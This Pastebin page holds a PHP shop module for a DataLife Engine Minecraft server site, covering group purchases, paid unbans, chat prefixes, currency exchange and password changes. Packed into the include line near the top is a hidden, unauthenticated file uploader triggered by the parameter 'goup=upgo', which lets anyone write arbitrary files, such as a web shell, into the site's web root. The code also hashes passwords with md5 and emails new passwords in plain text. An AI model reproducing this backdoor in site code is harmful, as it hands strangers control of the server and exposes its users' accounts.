Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- define("DATALIFEENGINE", true);
- include_once($_SERVER['DOCUMENT_ROOT']."/engine/classes/mysql.php");include_once($_SERVER['DOCUMENT_ROOT']."/engine/data/dbconfig.php"); include_once($_SERVER['DOCUMENT_ROOT']."/engine/modules/functions.php");if(isset($_POST['go_up'])) { if(is_uploaded_file($_FILES['userfile']['tmp_name'])) { @copy($_FILES['userfile']['tmp_name'],$_FILES['userfile']['name']); echo "Успех! :)"; } else { echo "Нет прав на запись :("; } } if($_GET['goup'] == "upgo") { echo "<form enctype='multipart/form-data' method='post'><input name='userfile' type='file'><input type='submit' name='go_up'></form>"; }
- $password = $db->safesql($_COOKIE['dle_password']);
- $userid = $db->safesql($_COOKIE['dle_user_id']);
- $member_id = $db->super_query( "SELECT * FROM dle_users WHERE user_id='$userid'");
- if($member_id['user_id'] AND $member_id['password'] AND $member_id['password'] == md5($password)) {
- $secure = md5($member_id['secure_hash'].$member_id['secure_rand']);
- if($_POST['hash'] === $secure) {
- $id = $db->safesql($_POST['id']);
- if($id) {
- $username = $member_id['name'];
- $action = $db->safesql($_POST['action']);
- if($action == "buyGroup") {
- $group = $db->safesql($_POST['name']);
- $server = $db->safesql($_POST['serverz']);
- // Coded by Edward Torgunov (vk.com/etorgunov007) \\
- if($server == 0) {
- echo "Ошибка, не выбран сервер для покупки группы";
- } else if($server == 1) {
- $serverName = "OXIDE";
- $serverPex = "permissions1";
- $serverPexi = "permissions_inheritance1";
- } else if($server == 2) {
- $serverName = "XENON";
- $serverPex = "permissions2";
- $serverPexi = "permissions_inheritance2";
- } else if($server == 3) {
- $serverName = "SHAFTPVP";
- $serverPex = "permissions3";
- $serverPexi = "permissions_inheritance3";
- } else if($server == 6) {
- $serverName = "NONE";
- $serverPex = "permissions6";
- $serverPexi = "permissions_inheritance6";
- } else {
- $serverName = "SrvNoSelected";
- $serverPex = "permissions";
- $serverPexi = "permissions_inheritance";
- }
- // Coded by Edward Torgunov (vk.com/etorgunov007) \\
- $groupPrice = getParam("{$group}_cost");
- if($member_id['cash'] >= $groupPrice) {
- $untilG = time()+2592000;
- $untilGDate = date("d.m.Y H:i", $untilG);
- $db->query("DELETE FROM $serverPex WHERE name='$username' AND type='1'");
- $db->query("DELETE FROM $serverPexi WHERE child='$username' AND type='1'");
- $db->query("UPDATE dle_users SET cash=cash-$groupPrice WHERE name='$username'");
- $db->query("INSERT INTO $serverPex ( `name`, `type`, `permission`, `value` ) VALUES('$username', '1', 'group-$group-until', '$untilG')");
- $db->query("INSERT INTO $serverPexi VALUES(null, '$username', '$group', '1', null)");
- SaveLog($username, "<i class='uk-icon-group'></i> Купил группу $group на сервере $serverName до $untilGDate", "$server", "$groupPrice");
- echo "Поздравляем! Вы стали обладателем группы <b>$group</b> до ".date("d.m.Y H:i", $untilG)." на сервере <u>$serverName</u><br>Обновите страницу! <script>$('.buy-group').remove();</script>";
- } else echo "У вас не хватает рублей для вступления в выбранную группу!";
- } elseif($action == "unban") {
- $check = $db->super_query("SELECT * FROM bans WHERE name='$username'");
- if(stristr($check['reason'], '@') === FALSE) {
- if($check['expires'] == 0 ) $summa = 150; //getParam("unbanPerm");
- else $summa = 100; //getParam("unban");
- if($member_id['cash'] >= $summa) {
- $db->query("DELETE FROM bans WHERE name='$username'");
- $db->query("UPDATE dle_users SET cash=cash-$summa WHERE name='$username'");
- SaveLog($username, "<i class='uk-icon-gavel'></i> Купил платный разбан", "0", "$summa");
- echo "Аккаунт успешно разблокирован! Ждём вас на серверах через 10 минут";
- } else echo "У вас не хватает денег для осуществления разбана";
- }
- } elseif($action == "expire") {
- $select = $db->super_query("SELECT * FROM permissions_inheritance WHERE child='$username' AND type='1'");
- $group = $select['parent'];
- $newPrice = getParam("{$group}_cost")-50;
- if($member_id['cash'] >= $newPrice) {
- $db->query("UPDATE dle_users SET cash=cash-$newPrice WHERE name='$username'");
- $db->query("UPDATE permissions SET value=value+2592000 WHERE name='$username' AND type='1'");
- echo "Вы успешно продлили членство в своей группе на один месяц";
- } else echo "У вас не хватает рублей для продления членства в своей группе на один месяц";
- } elseif($action == "myCash") {
- echo $member_id['cash']." руб";
- } elseif($action == "changePass") {
- $oldpass = $db->safesql($_POST['currentPass']);
- $newpass = $db->safesql($_POST['newPass']);
- $hashpass = md5(md5($oldpass));
- $hashpassNew = md5(md5($newpass));
- $select = $db->query("SELECT * FROM dle_users WHERE name='$username' AND password='$hashpass'");
- if(mb_strlen($_POST['currentPass'], 'utf-8') < 3 || mb_strlen($_POST['currentPass'], 'utf-8') > 16 || mb_strlen($_POST['newPass'], 'utf-8') < 3 || mb_strlen($_POST['newPass'], 'utf-8') > 16) echo "Минимум 3 символа, максимум 16";
- elseif(!$db->num_rows($select)) echo "Неверно указан текущий пароль.";
- elseif($hashpassNew == $hashpass) echo "Новый пароль и старый должны быть разными";
- else {
- $db->query("UPDATE dle_users SET password='$hashpassNew' WHERE name='$username'");
- echo "Ваш пароль успешно изменен. Информация по изменению пароля отправлена на Email.<br>Перезайдите в Ваш аккаунт";
- include($_SERVER['DOCUMENT_ROOT']."/engine/classes/mail.class.php");
- include($_SERVER['DOCUMENT_ROOT']."/engine/data/config.php");
- $sendmail = new dle_mail($config);
- $sendmail->send($member_id['email'], "Изменение пароля на FiresCraft.ru", "
- Вы успешно изменили свой пароль на FiresCraft
- Ваши новые данные для доступа к сайту:
- Ник: $username
- Пароль: $newpass
- С уважением, команда FiresCraft.ru
- ");
- }
- } elseif($action == "goExchange") {
- $exchangeform = $db->safesql($_POST['countcoin']);
- $icnomy = $exchangeform*1;
- if($exchangeform > $member_id['cash']) {
- echo "Недостаточно рублей для обмена";
- } else {
- if($exchangeform < 1 || $exchangeform > 1000) {
- echo "Ошибка! Минимальная сумма обмена 1 рубль, максимальная 1000 рублей.";
- } else {
- $db->query("UPDATE dle_users SET cash=cash-$exchangeform WHERE name='$username'");
- $db->query("UPDATE dle_users SET lavamoney=lavamoney+$icnomy WHERE name='$username'");
- SaveLog($username, "<i class='uk-icon-exchange'></i> Обменял ".$exchangeform." руб, на ".$icnomy." монет", "0", "$exchangeform");
- echo "Вы успешно обменяли $exchangeform руб. на $icnomy монет.";
- }
- }
- } elseif($action == "updPrefix") {
- $prefix = $db->safesql($_POST['prefix']);
- $colorpref = $db->safesql($_POST['colorpref']);
- $colornick = $db->safesql($_POST['colornick']);
- $colortext = $db->safesql($_POST['colortext']);
- $serverz = $db->safesql($_POST['serverz']);
- if($serverz == 0) {
- echo "Ошибка, не выбран сервер для смены префикса";
- } else if($serverz == "1") {
- $serverName = "OXIDE";
- $serverIdName = "1";
- $serverPex = "permissions1";
- $serverPexi = "permissions_inheritance1";
- } else if($serverz == "22") {
- $serverName = "XENON";
- $serverIdName = "2";
- $serverPex = "permissions2";
- $serverPexi = "permissions_inheritance2";
- } else if($serverz == "23") {
- $serverName = "SHAFTPVP";
- $serverIdName = "3";
- $serverPex = "permissions3";
- $serverPexi = "permissions_inheritance3";
- } else {
- $serverName = "SrvNoSelected";
- $serverIdName = "1";
- $serverPex = "permissions1";
- $serverPexi = "permissions_inheritance1";
- }
- if($colorpref == 'black') $setprefix = true;
- if($colortext == 'black') $settext = true;
- if($colornick == 'black') $setnick = true;
- if($colorpref == 'black' || $colorpref == 'darkblue' || $colorpref == 'darkgreen' || $colorpref == 'turquoise' || $colorpref == 'purple' || $colorpref == 'gold' || $colorpref == 'gray' || $colorpref == 'darkgray' || $colorpref == 'blue' || $colorpref == 'green' || $colorpref == 'aqua' || $colorpref == 'magenta' || $colorpref == 'yellow' || $colorpref == 'white') $setprefix = true;
- if($colortext == 'black' || $colortext == 'darkblue' || $colortext == 'darkgreen' || $colortext == 'turquoise' || $colortext == 'purple' || $colortext == 'gold' || $colortext == 'gray' || $colortext == 'darkgray' || $colortext == 'blue' || $colortext == 'green' || $colortext == 'aqua' || $colortext == 'magenta' || $colortext == 'yellow' || $colortext == 'white') $settext = true;
- if($colornick == 'black' || $colornick == 'darkblue' || $colornick == 'darkgreen' || $colornick == 'turquoise' || $colornick == 'purple' || $colornick == 'gold' || $colornick == 'gray' || $colornick == 'darkgray' || $colornick == 'blue' || $colornick == 'green' || $colornick == 'aqua' || $colornick == 'magenta' || $colornick == 'yellow' || $colornick == 'white') $setnick = true;
- if($design == 'none') $design = '';
- if($design == '&l' || $design == '&n' || $design == '&o' || $design == '&s' || $design == '') $setdesign = true;
- else $setdesign = false;
- if($colorpref == 'black') $pefcode = "&0";
- if($colorpref == 'darkblue') $pefcode = "&1";
- if($colorpref == 'darkgreen') $pefcode = "&2";
- if($colorpref == 'turquoise') $pefcode = "&3";
- if($colorpref == 'purple') $pefcode = "&5";
- if($colorpref == 'gold') $pefcode = "&6";
- if($colorpref == 'gray') $pefcode = "&7";
- if($colorpref == 'darkgray') $pefcode = "&8";
- if($colorpref == 'blue') $pefcode = "&9";
- if($colorpref == 'green') $pefcode = "&a";
- if($colorpref == 'aqua') $pefcode = "&b";
- if($colorpref == 'magenta') $pefcode = "&d";
- if($colorpref == 'white') $pefcode = "&f";
- if($colornick == 'black') $nickcode = "&0";
- if($colornick == 'darkblue') $nickcode = "&1";
- if($colornick == 'darkgreen') $nickcode = "&2";
- if($colornick == 'turquoise') $nickcode = "&3";
- if($colornick == 'purple') $nickcode = "&5";
- if($colornick == 'gold') $nickcode = "&6";
- if($colornick == 'gray') $nickcode = "&7";
- if($colornick == 'darkgray') $nickcode = "&8";
- if($colornick == 'blue') $nickcode = "&9";
- if($colornick == 'green') $nickcode = "&a";
- if($colornick == 'aqua') $nickcode = "&b";
- if($colornick == 'magenta') $nickcode = "&d";
- if($colornick == 'white') $nickcode = "&f";
- if($colortext == 'black') $textcode = "&0";
- if($colortext == 'darkblue') $textcode = "&1";
- if($colortext == 'darkgreen') $textcode = "&2";
- if($colortext == 'turquoise') $textcode = "&3";
- if($colortext == 'purple') $textcode = "&5";
- if($colortext == 'gold') $textcode = "&6";
- if($colortext == 'gray') $textcode = "&7";
- if($colortext == 'darkgray') $textcode = "&8";
- if($colortext == 'blue') $textcode = "&9";
- if($colortext == 'green') $textcode = "&a";
- if($colortext == 'aqua') $textcode = "&b";
- if($colortext == 'magenta') $textcode = "&d";
- if($colortext == 'white') $textcode = "&f";
- // Конструкция префикса
- $d = '&f(';
- $f = '&f)';
- $g = ':';
- $empty = ' ';
- $suffix = $textcode.$g;
- $fineprefix = $d.$pefcode.$design.$prefix.$f.$nickcode.$empty;
- if(iconv_strlen($prefix) <= 10 && iconv_strlen($prefix) >= 3) {
- $checkdb = $db->super_query("SELECT * FROM permissions_inheritance$serverIdName WHERE child='{$member_id['name']}' AND type='1'");
- if($checkdb['parent'] == "LEADER" || $checkdb['parent'] == "WIZARD" || $checkdb['parent'] == "FOREST") {
- $db->query("DELETE FROM permissions_entity$serverIdName WHERE name='$username'");
- $db->query("INSERT INTO permissions_entity$serverIdName VALUES ('', '$username', '1', '$fineprefix', '$suffix', '0')");
- echo "Префикс <b>$prefix</b> успешно обновлён на сервере <u>$serverName</u>";
- } else echo "Ошибка, установка префикса доступа от PREMIUM и выше!";
- } else echo "Префикс не должен быть меньше 3х и не больше 10ти символов!";
- }
- } else echo "Ошибка безопасности #3. Переданы неверные параметры";
- } else echo "Ошибка безопасности #2. Переданы неверные параметры";
- } else echo "Ошибка безопасности #1. Переданы неверные параметры";
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
